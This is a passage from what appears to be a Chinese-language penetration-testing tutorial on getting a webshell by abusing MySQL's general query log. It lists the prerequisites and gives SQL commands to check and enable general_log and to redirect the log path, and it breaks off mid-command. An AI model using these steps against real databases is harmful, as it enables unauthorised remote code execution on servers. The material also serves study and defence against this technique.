導讀:
時刻保持謙遜,始終保持學習,探尋事物的本質,不要把事情復雜化
話不多說,書接上回
三、利用日志getshell
利用條件:
- 擁有網站的寫入權限
- 知道網站的絕對路徑
- 數據庫日志開啟
實際操作:
(1)查看數據庫日志是否開啟以及路徑
show variables like '%general%';
(2)開啟日志功能
修改general_log的值為ON
set global general_log = "ON";
修改文件路徑;注意路徑用兩次\\進行轉義
set g